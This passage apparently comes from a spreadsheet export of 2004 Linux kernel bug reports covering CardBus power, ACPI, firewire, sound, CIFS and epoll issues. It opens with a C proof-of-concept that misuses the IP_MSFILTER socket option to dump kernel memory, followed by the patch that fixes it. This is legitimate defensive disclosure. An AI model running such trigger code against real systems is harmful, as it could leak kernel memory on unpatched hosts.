imsf_multiaddr; unsigned int imsf_interface; unsigned int imsf_fmode; unsigned int imsf_numsrc; unsigned int imsf_slist[1]; }; #define IP_MSFILTER_SIZE(numsrc) \ (sizeof(struct ip_msfilter) - sizeof(unsigned int) \ + (numsrc) * sizeof(unsigned int)) #define SIZE 1024 #define MULTICAST "224.0.0.0" #define ADDR "192.168.0.3" /* interface addr */ int main(int argc,char *argv[]) { int i,j,s,ret,len; struct ip_mreqn mreq; struct ip_msfilter *imsfp; char buf[IP_MSFILTER_SIZE(SIZE)]; s = socket(PF_INET,SOCK_STREAM,0); printf("socket s[%d]\n",s); if(s==-1) return -1; mreq.imr_multiaddr.s_addr = inet_addr(MULTICAST); mreq.imr_address.s_addr = inet_addr(ADDR); mreq.imr_ifindex = 0; ret = setsockopt(s,SOL_IP,IP_ADD_MEMBERSHIP,&amp;mreq,sizeof(mreq)); printf("setsockopt1 ret[%d]\n",ret); if(ret) return -2; while(getchar()!=EOF) { memset(buf,0,sizeof(buf)); imsfp = (struct ip_msfilter *)buf; imsfp-&gt;imsf_multiaddr = (unsigned int)inet_addr(MULTICAST); imsfp-&gt;imsf_interface = (unsigned int)inet_addr(ADDR); imsfp-&gt;imsf_fmode = MCAST_INCLUDE; imsfp-&gt;imsf_numsrc = SIZE; ret = setsockopt(s,SOL_IP,IP_MSFILTER,buf,IP_MSFILTER_SIZE(0)); printf("setsockopt2 ret[%d]\n",ret); if(ret) break; len = sizeof(buf); ret = getsockopt(s,SOL_IP,IP_MSFILTER,buf,&amp;len); printf("getsockopt ret[%d] len[%d]\n",ret,len); if(ret) break; printf("---"); for(i=IP_MSFILTER_SIZE(0);i&lt;len;i++) { printf("\n"); for(j=0;j&lt;16&amp;&amp;(i+j)&lt;len;j++) printf("%02x ",buf[i+j]&amp;0xff); if(j!=16) { for(;j&lt;16;j++) printf(" "); } printf(" | "); for(j=0;j&lt;16&amp;&amp;(i+j)&lt;len;j++) { if(isprint(buf[i+j])) printf("%c",buf[i+j]); else printf("."); } i += j; } printf("\n---\n"); } close(s); return 0; } ---------------------------------------------------------------------- // this is a patch ONLY to the problem of ipv4 setsockopt() IP_MSFILTER option. ---------------------------------------------------------------------- --- ip_sockglue.c-2.6.3 Wed Feb 18 12:57:21 2004 +++ ip_sockglue.c Thu Feb 19 01:05:39 2004 @@ -631,6 +631,15 @@ kfree(msf); break; } + /* + * ip_msfilter's imsf_slist and ip_sf_socklist's sl_addr are the + * same sizes (__u32). therefore, a required check is only this. + */ + if(((IP_SFLSIZE(msf-&gt;imsf_numsrc) - IP_SFLSIZE(0)) &lt; msf-&gt;imsf_numsrc) || + (IP_MSFILTER_SIZE(msf-&gt;imsf_numsrc) &gt; optlen)) { + kfree(msf); + goto e_inval; + } err = ip_mc_msfilter(sk, msf, 0); kfree(msf); break; ----------------------------------------------------------------------</t>
  </si>
  <si>
    <t>Guennadi Liakhovetski</t>
  </si>
  <si>
    <t>Removing 32bit cardbus card causes socket to remain in powered state.</t>
  </si>
  <si>
    <t>2.6.1, 2.6.3-rc4, 2.6.3-mm1</t>
  </si>
  <si>
    <t>2004-02-19 01:31 UTC</t>
  </si>
  <si>
    <t>Peter Johanson</t>
  </si>
  <si>
    <t>2004-05-30 14:44 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Thinkpad T30 + any of my many new cardbus cards Software Environment: Problem Description: Finally got my hands on a few cardbus cards to do some testing on, and seem to have found a nasty. With normal 16bit pcmcia cards, no problems. Removing a cardbus card from my laptop (either after "cardctl eject" or without doing this) causes this to show up in dmesg: PCMCIA: socket f7b1502c: *** DANGER *** unable to remove socket power All i can find on google is one message from russell king when he merged some stuff including this warning, telling people *not* to put cards back into a slot after this shows up, for fear of frying things. Seems to be card independant. Tried with an Edimax EW-7106PC (rtl8180), a Netgear MA521 (rtl8180), and with a Proxim Orinoco 11b/g Gold (Atheros). Steps to reproduce: Insert and remove a 32bit cardbus card. See warning. fret.</t>
  </si>
  <si>
    <t>ieee1394 and/or kernel interface for hotplug is broken in mm-sources</t>
  </si>
  <si>
    <t>2004-02-19 07:41 UTC</t>
  </si>
  <si>
    <t>Dale K D</t>
  </si>
  <si>
    <t>2004-02-25 18:36 UTC</t>
  </si>
  <si>
    <t>Distribution:Gentoo Hardware Environment:Pentium 4 Software Environment: Problem Description:Firewire is broken in mm-sources Steps to reproduce: 1 plug in iPod 2 modprobe ohci1394 3 modprobe sbp2 ( /dev/sda1 and /dev/sda2 get created at this point ) 4 mount the iPod (/dev/sda2) 5 umount the iPod (/dev/sda2) 6 rmmod sbp2 7 rmmod ohci1394 8 repeat steps 2 and 3 ( /dev/sdas1 and /dev/sda2 DO NOT Get created at this point ) 9 rmmod sbp2 10 rmmod ohci1394 (system either errors or freezes at this point) Please let me know what other information you require to fix this. I'd really like to run the mm-sources but I can't with the firewire in the state it is in. The firewire works perfectly in regualr 2.6.x kernels.</t>
  </si>
  <si>
    <t>ACPI: No IRQ known ... - using IRQ 255</t>
  </si>
  <si>
    <t>2.6.2, 2.6.3</t>
  </si>
  <si>
    <t>2004-02-19 08:49 UTC</t>
  </si>
  <si>
    <t>Bjarni R</t>
  </si>
  <si>
    <t>2004-05-11 23:24 UTC</t>
  </si>
  <si>
    <t>The (dev-&gt;irq &amp;&amp; dev-&gt;irq &gt;= 0xF) comparison in the code snippet below should read (dev-&gt;irq &amp;&amp; dev-&gt;irq &lt;= 0xF), if the comments are correct. This is taken from line 356 or so in drivers/acpi/pci_irq.c. I haven't personally noticed any problems caused by this, but stumbled over it when looking for a way to get my Libretto 100CT's CardBus interface to give a IRQ to a USB card. Relevant code: /* * No IRQ known to the ACPI subsystem - maybe the BIOS / * driver reported one, then use it. Exit in any case. */ if (!irq) { printk(KERN_WARNING PREFIX "No IRQ known for interrupt pin %c of device %s", ('A' + pin), pci_name(dev)); /* Interrupt Line values above 0xF are forbidden */ if (dev-&gt;irq &amp;&amp; dev-&gt;irq &gt;= 0xF) { printk(" - using IRQ %d\n", dev-&gt;irq); return_VALUE(dev-&gt;irq); } else { printk("\n"); return_VALUE(0); } }</t>
  </si>
  <si>
    <t>2004-02-19 12:19 UTC</t>
  </si>
  <si>
    <t>Duc Le</t>
  </si>
  <si>
    <t>2004-02-19 12:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: AMD Duron 1GHz Software Environment: Linux 2.6.2 Problem Description: Problem mounting (Lexar) memory stick on a Sony Clie SJ33 PDA as a USB mass-storage device. I found a patch from Stephen Hemminger to unusual_devs.h which solved the problem. See: kreucher.net/pipermail/clie-linux/2003q4/000474.html The only change from that in the kernel was the second entry: i.e. UNUSUAL_DEV( 0x054c, 0x006d, 0x0000, 0x9999, should be UNUSUAL_DEV( 0x054c, 0x0099, 0x0000, 0x9999, I don't know whether it will cause conflicts elsewhere, so it was not patched into the kernel, but it seems to work fine for me. Steps to reproduce:</t>
  </si>
  <si>
    <t>ALSA Trident/SiS7018 driver stopped working with SiS7018</t>
  </si>
  <si>
    <t>2004-02-20 05:08 UTC</t>
  </si>
  <si>
    <t>Henrik Brix Andersen</t>
  </si>
  <si>
    <t>2004-03-21 10:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux (Gentoo Base System version 1.4.3.13) Hardware Environment: MiTAC 7521 laptop (output of lspci -vv attached) Software Environment: Linux fungoid 2.6.3 #5 Fri Feb 20 13:27:30 CET 2004 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux Gnu C 3.3.2 Gnu make 3.80 util-linux 2.12 mount 2.12 module-init-tools 0.9.15-pre4 e2fsprogs 1.34 pcmcia-cs 3.2.5 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.15 Net-tools 1.60 Kbd 1.08 Sh-utils 5.0.91 Modules Loaded snd_trident snd_ac97_codec snd_util_mem snd_mpu401_uart snd_rawmidi snd_pcm_oss snd_pcm snd_page_alloc snd_timer snd_mixer_oss snd soundcore sg sd_mod orinoco_cs orinoco hermes ds yenta_socket pcmcia_core Problem Description: With kernel 2.6.1 and 2.6.2 the ALSA Trident/SiS7018 (SND_TRIDENT) driver works great with my SiS630-based laptop with onboard SiS7018 soundcard. I just upgraded to vanilla 2.6.3 (using a .config from 2.6.2 and 'make oldconfig') and I get no sound and dmesg reports: Trident4DWaveAudio: probe of 0000:00:01.4 failed with error -16 This happens with the soundsystem compiled as modules as well as static. I tried kernel 2.6.3-mm1 and it behaves gives the same failure message. Steps to reproduce: 1. Compile in support for SND_TRIDENT 2. Boot the kernel on a computer with a SiS7018 based soundcard 3. Run 'dmesg' and see the above failure message Please let me know if you need more information from me to investigate this problem further.</t>
  </si>
  <si>
    <t>P1 blocking</t>
  </si>
  <si>
    <t>2004-02-23 03:40 UTC</t>
  </si>
  <si>
    <t>Stefan Seyfried</t>
  </si>
  <si>
    <t>2005-07-11 14:26 UTC</t>
  </si>
  <si>
    <t>after resume from ACPI S4 suspend to disk, i get an oops in psmouse_reconnect. The machine works fine afterwards, but the touchpad is no longer available. The machine is an HP compaq nx5000 notebook (centrino), it also happens with init=/bin/bash and no other drivers loaded. psmouse is compiled into the kernel (no module). I'll attach the oops from /var/log/messages and /proc/ config.gz</t>
  </si>
  <si>
    <t>(net ne2k-pci) insl/outsl macro redefinition</t>
  </si>
  <si>
    <t>2.4 and newer</t>
  </si>
  <si>
    <t>2004-02-23 11:47 UTC</t>
  </si>
  <si>
    <t>2004-12-06 12:58 UTC</t>
  </si>
  <si>
    <t>this pops up on every kernel 2.4 and later: CC [M] drivers/net/ne2k-pci.o drivers/net/ne2k-pci.c:72:1: warning: "insl" redefined In file included from include/linux/dmapool.h:14, from include/linux/pci.h:693, from drivers/net/ne2k-pci.c:50: include/asm/io.h:82:1: warning: this is the location of the previous definition drivers/net/ne2k-pci.c:73:1: warning: "outsl" redefined include/asm/io.h:83:1: warning: this is the location of the previous definition native powerpc-linux time to fix it.</t>
  </si>
  <si>
    <t>MCE on return from S3 - Toshiba Satellite Pro M15-S405</t>
  </si>
  <si>
    <t>Fedora Core 2-test1</t>
  </si>
  <si>
    <t>2004-02-24 00:03 UTC</t>
  </si>
  <si>
    <t>2005-11-07 17:33 UTC</t>
  </si>
  <si>
    <t>MCE: The hardware reports a non fatal, correctable incident occurred on C. Bank 1: e200000000000121 Toshiba Satellite Pro M15-S405</t>
  </si>
  <si>
    <t>this is a test to make sure bugzilla is working</t>
  </si>
  <si>
    <t>2004-02-24 10:34 UTC</t>
  </si>
  <si>
    <t>Christine Moore</t>
  </si>
  <si>
    <t>2004-02-24 10:35 UTC</t>
  </si>
  <si>
    <t>OOPS while playing with sensors-detect on a preempt kernel</t>
  </si>
  <si>
    <t>2.6.3-mm3</t>
  </si>
  <si>
    <t>2004-02-24 16:28 UTC</t>
  </si>
  <si>
    <t>2004-03-11 13:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Devel (Rawhide) Hardware Environment: http://www.giga-byte.com/products/7vax.htm Software Environment: lm_sensors 2.8.4 Problem Description: Feb 25 00:45:34 rousalka kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000000 Feb 25 00:45:34 rousalka kernel: printing eip: Feb 25 00:45:34 rousalka kernel: c0262b23 Feb 25 00:45:34 rousalka kernel: *pde = 00000000 Feb 25 00:45:34 rousalka kernel: Oops: 0000 [#1] Feb 25 00:45:34 rousalka kernel: PREEMPT Feb 25 00:45:34 rousalka kernel: CPU: 0 Feb 25 00:45:34 rousalka kernel: EIP: 0060:[&lt;c0262b23&gt;] Not tainted VLI Feb 25 00:45:34 rousalka kernel: EFLAGS: 00010282 Feb 25 00:45:34 rousalka kernel: EIP is at i2cdev_ioctl+0x2b/0x698 Feb 25 00:45:34 rousalka kernel: eax: 00000000 ebx: bffff548 ecx: 00005401 edx: f784a200 Feb 25 00:45:34 rousalka kernel: esi: 00005401 edi: 00005401 ebp: f403ca80 esp: f6d5ff10 Feb 25 00:45:34 rousalka kernel: ds: 007b es: 007b ss: 0068 Feb 25 00:45:34 rousalka kernel: Process sensors-detect (pid: 2188, threadinfo=f6d5e000 task=f6c065f0) Feb 25 00:45:34 rousalka kernel: Stack: f784a270 00000001 00005401 bffff548 f4039314 c02631d4 f6d5e000 f7dd5840 Feb 25 00:45:34 rousalka kernel: f4039314 00000001 c0150398 f784a200 f403ca80 00000001 00000001 f403ca80 Feb 25 00:45:34 rousalka kernel: f4039314 f7ff4f80 c014891b 00000000 f3f33840 f6d5ff78 00008000 f76d5000 Feb 25 00:45:34 rousalka kernel: Call Trace: Feb 25 00:45:34 rousalka kernel: [&lt;c02631d4&gt;] i2cdev_open+0x44/0x73 Feb 25 00:45:34 rousalka kernel: [&lt;c0150398&gt;] chrdev_open+0x175/0x1ba Feb 25 00:45:34 rousalka kernel: [&lt;c014891b&gt;] dentry_open+0xf6/0x1c5 Feb 25 00:45:34 rousalka kernel: [&lt;c014881f&gt;] filp_open+0x36/0x3c Feb 25 00:45:34 rousalka kernel: [&lt;c0157b10&gt;] sys_ioctl+0x206/0x24e Feb 25 00:45:34 rousalka kernel: [&lt;c02f6a86&gt;] sysenter_past_esp+0x43/0x65 Feb 25 00:45:34 rousalka kernel: Feb 25 00:45:34 rousalka kernel: Code: 55 57 56 89 ce 53 83 ec 68 8b 52 7c 8b 5c 24 7c 89 54 24 1c 8b 40 38 53 51 25 ff ff 0f 00 50 89 d0 83 c0 70 50 8b 82 88 00 00 00 &lt;ff&gt; 30 68 06 82 33 c0 e8 18 b9 eb ff 8d 86 fd f8 ff ff 83 c4 18 Feb 25 00:50:53 rousalka kernel: &lt;7&gt;i2c-core: driver lm90 registered. Feb 25 00:51:51 rousalka kernel: i2c_adapter i2c-4: Unsupported chip (man_id=0x01, chip_id=0x21). Steps to reproduce: Play with sensors-detect probably (didn't try to reproduce it yet)</t>
  </si>
  <si>
    <t>capset01 test fails on 2.6.3 kernel</t>
  </si>
  <si>
    <t>2004-02-25 03:28 UTC</t>
  </si>
  <si>
    <t>B N Poornima</t>
  </si>
  <si>
    <t>2004-04-07 05:01 UTC</t>
  </si>
  <si>
    <t>Stephanie Glass</t>
  </si>
  <si>
    <t>Distribution: Redhat 9.0 (Shrike) Hardware Environment: X-305 (1 way) CPU info: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 1.80GHz stepping : 4 cpu MHz : 1800.491 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm bogomips : 3538.94 Meminfo: MemTotal: 515152 kB MemFree: 319432 kB Buffers: 44068 kB Cached: 103644 kB SwapCached: 31324 kB Active: 72608 kB Inactive: 108040 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 515152 kB LowFree: 319432 kB SwapTotal: 1052216 kB SwapFree: 983192 kB Dirty: 24 kB Writeback: 0 kB Mapped: 15528 kB Slab: 11976 kB Committed_AS: 120824 kB PageTables: 936 kB VmallocTotal: 507896 kB VmallocUsed: 732 kB VmallocChunk: 507164 kB Filesystem info: / ext3 /home ext3 /opt ext3 /dev/shm tmpfs /tmp ext3 /usr ext3 /usr/local ext2 /var ext3 /dev/hda8 swap Partition info: Filesystem Size Used Avail Use% Mounted on /dev/hda1 10G 771M 8.7G 8% / /dev/hda2 5.8G 33M 5.5G 1% /home /dev/hda7 4.9G 33M 4.6G 1% /opt none 252M 0 252M 0% /dev/shm /dev/hda9 788M 25M 723M 4% /tmp /dev/hda5 4.9G 3.1G 1.5G 68% /usr /dev/hda3 4.9G 17M 4.6G 1% /usr/local /dev/hda6 4.9G 84M 4.5G 2% /var Software Environment: Kernel 2.6.3 Problem Description: capset01 test fails on 2.6.3 kernel when running the runalltests.sh from LTP test suite. Steps to reproduce: 1. Compile and install the latest LTP test suite on the machine as root 2. Execute runalltests.sh as root 3. View the log file for failures. Actual Results: Capset01 test fails. The corresponding output file contents are as follows: "capset01 1 FAIL : Test Failed, capset() returned -1, errno = 1 : Operation not permitted " Looking at the man page explanation for capset system call, the error explanation corresponds to: " An attempt was made to add a capability to the Permitted set, or to set a capability in the Effective or Inheritable sets that is not in the Permitted set." But this should not be the case as we are executing as root. Expected Results: capset01 should pass. Additional Information: Test fails even when executed individually. I tried the test on 2.6.2 and it failed. But the test passes on 2.6.2-rc3 and 2.6.2-rc3-mm1. Hence, the problem started from 2.6.2 onwards.</t>
  </si>
  <si>
    <t>mount -t cifs: kernel Oops, + smbfs segmentation fault</t>
  </si>
  <si>
    <t>2004-02-25 06:45 UTC</t>
  </si>
  <si>
    <t>2004-07-26 14:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: dual PIII-500 atsrvlx02:~# lspci 00:00.0 Host bridge: Intel Corp. 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 03) 00:01.0 PCI bridge: Intel Corp. 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 03) 00:07.0 ISA bridge: Intel Corp. 82371AB/EB/MB PIIX4 ISA (rev 02) 00:07.1 IDE interface: Intel Corp. 82371AB/EB/MB PIIX4 IDE (rev 01) 00:07.2 USB Controller: Intel Corp. 82371AB/EB/MB PIIX4 USB (rev 01) 00:07.3 Bridge: Intel Corp. 82371AB/EB/MB PIIX4 ACPI (rev 02) 00:11.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 30) 00:12.0 SCSI storage controller: Adaptec AHA-2940U2/U2W 00:13.0 SCSI storage controller: ICP Vortex Computersysteme GmbH GDT 6537RP 01:00.0 VGA compatible controller: Matrox Graphics, Inc. MGA G200 AGP (rev 03) atsrvlx02:~# Software Environment: ii gcc 3.3-1 The GNU C compiler. ii samba 3.0.2a-1 a LanManager-like file and printer server for ii smbfs 3.0.2a-1 mount and umount commands for the smbfs (for k ii libc6 2.3.2.ds1-11 GNU C Library: Shared libraries and Timezone d ii libc6-dev 2.3.2.ds1-11 GNU C Library: Development Libraries and Heade atsrvlx02:~# uname -a Linux atsrvlx02 2.6.3 #2 SMP Wed Feb 25 12:52:05 CET 2004 i686 GNU/Linux atsrvlx02:~# Problem Description: mount -t cifs segfaults at once, leaving a kernel oops: CIFS VFS: cifs_mount failed w/return code = -22 Unable to handle kernel paging request at virtual address 5a5a5a72 printing eip: c02309c6 *pde = 00000000 Oops: 0000 [#3] CPU: 1 EIP: 0060:[&lt;c02309c6&gt;] Not tainted EFLAGS: 00010206 EIP is at unload_nls+0x6/0x40 eax: 5a5a5a5a ebx: 00000001 ecx: dc6a8000 edx: d2fa5494 esi: 00000000 edi: ffffffea ebp: dc6a9e88 esp: dc6a9e88 ds: 007b es: 007b ss: 0068 Process mount (pid: 1331, threadinfo=dc6a8000 task=d90be9b0) Stack: dc6a9eb0 c023b54e 5a5a5a5a ffffffea 00000000 d8542000 d2fa5494 d9ab3df8 00000000 d8542000 dc6a9ed4 c023b987 d9ab3df8 00000000 d8542000 00000000 f7f81fa4 fffffff4 c0553280 dc6a9ef8 c01707e6 c0553280 00000000 d8542000 Call Trace: [&lt;c023b54e&gt;] cifs_read_super+0x9e/0x150 [&lt;c023b987&gt;] cifs_get_sb+0x77/0xc0 [&lt;c01707e6&gt;] do_kern_mount+0x56/0xd0 [&lt;c018a895&gt;] do_add_mount+0x75/0x160 [&lt;c018abc0&gt;] do_mount+0x140/0x190 [&lt;c0149265&gt;] __get_free_pages+0x35/0x40 [&lt;c018aa07&gt;] copy_mount_options+0x87/0x100 [&lt;c018b083&gt;] sys_mount+0xd3/0x180 [&lt;c010b753&gt;] syscall_call+0x7/0xb Code: 8b 50 18 85 d2 74 1b b8 00 e0 ff ff 21 e0 8b 40 10 c1 e0 05 &lt;5&gt;smb_proc_readdir_long: error=-5, breaking smb_proc_readdir_long: error=-5, breaking Steps to reproduce: atsrvlx02:~# mount -t cifs //172.21.14.97/DFSROOT02PLW /mnt/projekte/ Segmentation fault atsrvlx02:~# mount -t cifs //172.2 /mnt/projekte/ Segmentation fault atsrvlx02:~# I will be glade to give you more infos, if you let me know what is further neccessary.</t>
  </si>
  <si>
    <t>ARM</t>
  </si>
  <si>
    <t>2.6.x...2.6.3 too</t>
  </si>
  <si>
    <t>Patrizio Bassi</t>
  </si>
  <si>
    <t>acpi poweroff trouble</t>
  </si>
  <si>
    <t>2004-02-25 09:53 UTC</t>
  </si>
  <si>
    <t>2004-09-09 07:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: intel 440bx pentium2 Software Environment: Problem Description: turning off my pc works...but not in the same way it worked with 2.4.24 with apm. in fact Windows (sorry!!) and 2.4.24 with apm before turning off pc make a ide hd* flushing. with 2.4.24 i see even the print "flushing devices" and so on...after i hear the sound of harddisks powering off and parking headers and pc turn off. with 2.6.x apm i have the same behaviour but pc doesn't turn off. hd flushes and i see a "power off" print but pc is still powered. so i tried acpi. it turn off my pc but doesn't flush hds..so i think it's much less safe that previous configuration. i tried to enable some parameters in kernel configuration but...no way Steps to reproduce: enable acpi and turn off</t>
  </si>
  <si>
    <t>Failures when running epoll test</t>
  </si>
  <si>
    <t>2.6.4-38-pseries64</t>
  </si>
  <si>
    <t>2004-02-25 14:01 UTC</t>
  </si>
  <si>
    <t>2004-08-13 12:24 UTC</t>
  </si>
  <si>
    <t>Davide Libenzi</t>
  </si>
  <si>
    <t>Hardware Environment: PPC64 Software Environment: SuSE SLES 8 2.6.3 kernel Steps to Reproduce: 1. Install the 2.6.3 kernel from the ameslab tree 2. Install the latest version of ltp (20040206 version) 3. Link the epoll-ltp.c file with ltp and libepoll 4. Compile the epoll-ltp.c 5. ./epoll-ltp I have attached the actual failures in a text file, which shows which test was ran along with the values that were passed. I have also attached the epoll- ltp.c I used to run this test. Actual Result: sys_epoll02 0 INFO:Summary: Of 27648 tests, epoll_ctl failed 448 ( 98% passed). 448 failures occurred Expected Results: Failures should not occur. Additional Information: gcc versions: cross-ppc64-gcc-3.2-49 gcc-3.2-32</t>
  </si>
  <si>
    <t>uncorrectly enabling GPEs</t>
  </si>
  <si>
    <t>2004-02-26 01:56 UTC</t>
  </si>
  <si>
    <t>Current ACPI implementation will enable a GPE if its corresponding _Lxx or _Exx method is found. But some GPEs the methods stand are wakeup GPEs. we shouldn't enable it before system enters sleep state. In my P4 box, keyboard is such kind of devices. keyboard can generate 0x15 GPE to wakeup system, and DSDT has a method '_L15'. In 2.6.2, after boot, every hitting keyboard generates a SCI interrupt. if 0x15 is not enabled, keyboard doesn't create SCI.</t>
  </si>
  <si>
    <t>ioapic+shared interrupt+concurrent access=ide lockup</t>
  </si>
  <si>
    <t>2004-02-26 08:39 UTC</t>
  </si>
  <si>
    <t>Andreas Steinmetz</t>
  </si>
  <si>
    <t>2005-07-17 15:45 UTC</t>
  </si>
  <si>
    <t>Distribution: alternatively home-made or SuSE 9.0 x86-64 Hardware Environment: Tyan S2885 dual Opteron 246 Software Environment: N/A Problem Description: Summary: -------- The ide subsystem locks up on a dual Opteron system when io-apic is enabled and there are concurrent accesses to both ide channels of a pci ide controller card. The lockup occurs on different pci ide controller cards and there are boot parameters that can be used as workarounds. Details are given below. If additional information is required please contact me. I can currently run any tests required to fix this problem. Symptoms: --------- Execute: "dd if=/dev/hde of=/dev/null &amp; ; dd if=/dev/hdg of=/dev/null &amp;" This results after a short time in: hde: dma_timer_expiry: dma status == 0x24 hdg: dma_timer_expiry: dma status == 0x24 hde: DMA interrupt recovery hde: lost interrupt hdg: DMA interrupt recovery hdg: lost interrupt hde: dma_timer_expiry: dma status == 0x24 hdg: dma_timer_expiry: dma status == 0x24 hde: DMA interrupt recovery hde: lost interrupt hdg: DMA interrupt recovery hdg: lost interrupt ... Further accesses to hde and hdg always result then in the same messages as stated above. The MIS count of /proc/interrupts steadily increases prior to the lockup. It always has the same value as the ide2/ide3 interrupt count on cpu1. Note that no irq balancing is active so there should be no interrupts on cpu1. During the tests causing the lockup the system is otherwise idle. Workarounds: ------------ In the cases listed below the lockup does not happen and the MIS count of /proc/interrupts stays at zero. 1. Boot with "noapic" 2. Boot with "ide2=serialize" 3. Boot with "ide3=serialize" System: ------- Tyan S2885 dual Opteron 246 IDE config: ----------- ide0/hda WD2500JB ide1/hdc WD2500JB ide2/hde WD2500JB ide3/hdg DVD-RW ide2/ide3 are were tested with the following cards: HPT302, CMD680 and PDC20268 (the latter being now the one in the system). All cards show the same behaviour so it is probably not a driver problem. It doesn't matter if hdg is a DVD-RW or a hard disk, the problem is the same.</t>
  </si>
  <si>
    <t>Failed to login on 2.6.3 kernel with patch-2.6.3-mjb1.7</t>
  </si>
  <si>
    <t>2004-02-26 13:41 UTC</t>
  </si>
  <si>
    <t>2005-04-07 11:45 UTC</t>
  </si>
  <si>
    <t>alt-trees_mjb</t>
  </si>
  <si>
    <t>Distribution:SuSE SLES8 Hardware Environment:xSeries 8way xeon 700MHz 4.3GB RAM Software Environment:kernel 2.6.3 from www.kernel.org tree plus patch-2.6.3-mjb1.7 Problem Description: Following is the messages on console when booting up: ========================== ..... md: autorun ... md: ... autorun DONE. VFS: Mounted root (ext2 filesystem) read only Freeing unused kernel memory: 424k freed INIT: version 2.82 booting INIT: Entering runlevel: 3 Welcome to SuSE SLES9(i586) - Kernel 2.6.3-mjb2 (tty1). (none) login: ========================== Then I typed root at the login prompt, It returned: "FATAL: cannot change permissions of TTY: Read-only file system." Steps to reproduce: 1. Downloaded kernel version 2.6.3 source from www.kernel.org 2. Applied patch-2.6.3-mjb1.7 3. Configure with vsys gettimeofday turn on 4. Compile the kernel, reboot to the new kernel 5. Login and have the error as describe above.</t>
  </si>
  <si>
    <t>vc_resize do not copy data from origin screen buffer to new buffer correctly</t>
  </si>
  <si>
    <t>2004-02-27 00:09 UTC</t>
  </si>
  <si>
    <t>2005-08-15 17:44 UTC</t>
  </si>
  <si>
    <t>Kernel Panic with HPT374 and solution!</t>
  </si>
  <si>
    <t>2004-02-27 00:38 UTC</t>
  </si>
  <si>
    <t>Olaf Boehm</t>
  </si>
  <si>
    <t>2006-05-19 12:37 UTC</t>
  </si>
  <si>
    <t>with the 2.6.0-test3 kernel, hpt366 still does nothing else than kernel panic on my machine. However, I found that with my EPoX 8K9A3+, the 0x78 (frequency) register of HPT374 has values in the interval of 0x9B..0x9E, although the FSB is set to 133MHz and PCI should be at 33. Then, in init_hpt37x, the execution usually goes thru the "freq &lt; 0xb0" branch, which doesn't do the pci_set_drvdata stuff. Later, the frequency detection loop fails because hpt374 internal PLL isn't supported. However, changing the respective branch to } else if (freq &lt; 0xb0) { pll = F_LOW_PCI_40; if (hpt_minimum_revision(dev,8)) { pci_set_drvdata(dev, (void *) thirty_three_base_hpt374); printk("HPT37X: using 33MHz PCI clock\n"); } } ... made the driver work, although I didn't have time to test it (just mounted the disk and copied a few files). kernel panic too with hpt374 on epox 4pca3+ (onboard hpt374) I875 applied patch and working now</t>
  </si>
  <si>
    <t>Make Kernel bug + solution</t>
  </si>
  <si>
    <t>2.6.3 2.6.0</t>
  </si>
  <si>
    <t>2004-02-27 00:41 UTC</t>
  </si>
  <si>
    <t>2004-03-01 11:25 UTC</t>
  </si>
  <si>
    <t>Alexander Y. Fomichev</t>
  </si>
  <si>
    <t>Critical ppp /dialup problem.</t>
  </si>
  <si>
    <t>Linux version 2.6.10 (root@leenooks) (gcc version 3.3.4 20040623</t>
  </si>
  <si>
    <t>2004-02-27 10:21 UTC</t>
  </si>
  <si>
    <t>2005-05-07 19:29 UTC</t>
  </si>
  <si>
    <t>Distribution: N/A. Hardware Environment: Athlon MP (SMP), 1GB, external hardware serial modem. Software Environment: GCC 3.3.3 Problem Description: Transmitting a large ammount of data causes the network connection to break. Steps to reproduce: 1. Simply attempt to send a file larger than a few tens of killobytes as an e-mail attachment with Mozilla. 2. Try to update your mozilla source, it will always hang on the "cvs -d :pserver:anonymous@cvs-mirror.mozilla.org:/cvsroot -q -z 3 co -r MOZILLA_1_6_RELEASE -P SeaMonkeyAll" step. (Which I presume involves transmitting a sizable ammount of data to the server. I had previously reported a similar bug which was reproducable in a similar manner in 2.6.1, That bug involved a kernel oops. I have been unable to reproduce said oops.. I suspect that this bug is some kind of buffer bug somewhere in the protocol stack. Given that this is an external hardware modem, it is very possible that this could be a bug in the serial driver. I gave this bug a high priority because it drasticly reduces the number of things I can do with my linux installation.</t>
  </si>
  <si>
    <t>CASTET Matthieu</t>
  </si>
  <si>
    <t>USB printer problem on AMD64</t>
  </si>
  <si>
    <t>2.6.4-rc1 (2.6.3-mm4)</t>
  </si>
  <si>
    <t>2004-02-28 10:10 UTC</t>
  </si>
  <si>
    <t>2004-03-13 17:39 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.0 64-bit (x86_64) Hardware Environment: 2 x AMD Opteron 240, Tyan Thunder K8W, 1 GB RAM (4 x 256, two nodes, dual-channel), LSI 53C1010 64-bit SCSI + 2 x HDD (IBM), NEC-based USB 2.0 adapter (Manhattan), GeForce FX5200 (LeadTek), 2 x SATA HDD (Seagate, Samsung), IDE DVD (Liteon), IDE DVDR (Liteon), HP DJ930c printer (USB) Software Environment: SuSE 9.0 (downloadable version) + KDE 3.2 (from kde.org) + kernel 2.6.4-rc1 (2.6.3-mm4) Problem Description: After printix approx. 3/4 of a page the printer stops and signals an error condition. This is accompanied by the following kernel message: chimera kernel: usb 5-1: hcd_unlink_urb 00000100175d1cc0 fail -22 Afterwards the printer does not seem to accept any data and I have to reconnect it to the USB bus (ie. disconnect and connect it again) to make it work. Steps to reproduce: Try to print a testpage (whatever).</t>
  </si>
  <si>
